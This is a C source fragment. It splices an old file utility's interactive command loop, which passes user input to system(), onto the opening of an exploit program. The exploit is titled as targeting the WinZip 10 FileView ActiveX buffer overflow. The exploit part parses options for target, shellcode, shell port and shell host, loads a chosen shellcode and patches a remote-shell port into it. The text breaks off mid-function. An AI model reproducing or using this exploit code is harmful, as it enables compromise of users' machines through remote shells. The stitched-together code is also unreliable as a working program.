interact()
{
int i, intrpt();
char cmd[80], *rest, *index();
for (;;) {
if (firsttime++ == 0) {
signal(SIGINT, intrpt, -1);
setret(env);
}
if (cmdinp(cmd) < 0)
return (0);
rest = index(cmd, ' ');
if (rest)
*rest++ = '\0';
i = chkcmd(cmd);
#ifdef DEBUG
printf("command: %s, ind: %d\n", cmd, i);
#endif
switch (i) {
default:
errinp;
break;
case CMD_DIR:
case CMD_LS:
dispdir();
break;
case CMD_RENAME:
rename(rest);
break;
case CMD_OCOPY:
copyc(rest, 0);
break;
case CMD_ICOPY:
pip(rest, 0);
break;
case CMD_DELETE:
case CMD_ERASE:
delete(rest);
break;
case CMD_EXIT:
case CMD_LOGOUT:
return(0);
case CMD_TYPE:
copy(rest, stdout, 0);
break;
case CMD_HELP:
help();
break;
case CMD_OCCOPY:
copyc(rest, 1);
break;
case CMD_ICCOPY:
pip(rest,1);
break;
case CMD_DUMP:
dump(rest);
break;
case CMD_UNIX:
system(rest);
break;
case CMD_DISK:
disk();
break;
}
}
}
int main(int argc, char* argv[]){
unsigned long i, fd;
int c, index, payg, paya, lhost;
short shellport, shellport2;
int ishell = 0, itarg = 0;
char *buffer, *file, *img, *payload;
static struct option options[] = {
{"filename", 1, 0, 'f'},
{"imgname", 1, 0, 'i'},
{"target", 1, 0, 't'},
{"shellcode", 1, 0, 's'},
{"shellport", 1, 0, 'p'},
{"shellhost", 1, 0, 'd'},
{"help", 0, 0,'h'}
};
printf("[ WinZip 10 <= 10.0.7245 FileView ActiveX overflow exploit\n");
while(c != -1){
c = getopt_long(argc,argv,"f:i:t:s:p:d:h",options,&index);
switch(c){
case 'f':
file = optarg;
break;
case 'i':
img = optarg;
break;
case 't':
itarg = 1;
setret(optarg);
if(strlen((char*)&ret) < 4){
fprintf(stderr,"[ Selected target contains a null address!\n");
exit(-1);
}
break;
case 's':
if(ishell==0){
payg = atoi(optarg);
switch(payg){
case 0:
printf("[ Using shellcode '%s' (%d bytes)\n",shellcodes[payg].name,strlen(shellcodes[payg].shellcode));
payload = malloc(strlen(shellcodes[payg].shellcode)+1);
memset(payload,0,strlen(shellcodes[payg].shellcode)+1);
memcpy((void*)payload,(void*)shellcodes[payg].shellcode,strlen(shellcodes[payg].shellcode));
shellport2 = 4444;
ishell = 1;
break;
case 1:
printf("[ Using shellcode '%s' (%d bytes)\n",shellcodes[payg].name,strlen(shellcodes[payg].shellcode));
payload = malloc(strlen(shellcodes[payg].shellcode)+1);
memset(payload,0,strlen(shellcodes[payg].shellcode)+1);
memcpy((void*)payload,(void*)shellcodes[payg].shellcode,strlen(shellcodes[payg].shellcode));
shellport2 = 4444;
ishell = 1;
break;
default:
printf("[ Invalid shellcode selection %d\n",payg);
exit(0);
break;
}
}
break;
case 'p':
if(ishell==1){
if(shellcodes[payg].port > -1){
paya = strlen(payload);
shellport = atoi(optarg);
shellport2 = shellport;
shellport =(shellport&0xff)<<8 | shellport>>8;
memcpy((void*)&payload[shellcodes[payg].port],&shellport,sizeof(shellport));
if(paya > strlen(payload)) {
printf("[ Error shellcode port introduces null bytes\n");
exit(1);
}
printf("[ Shellcode port changed to '%u'\n",atoi(optarg));
}
else{
printf("[ (%s) port selection is ignored for current shellcode\n",optarg);
}
}
else{
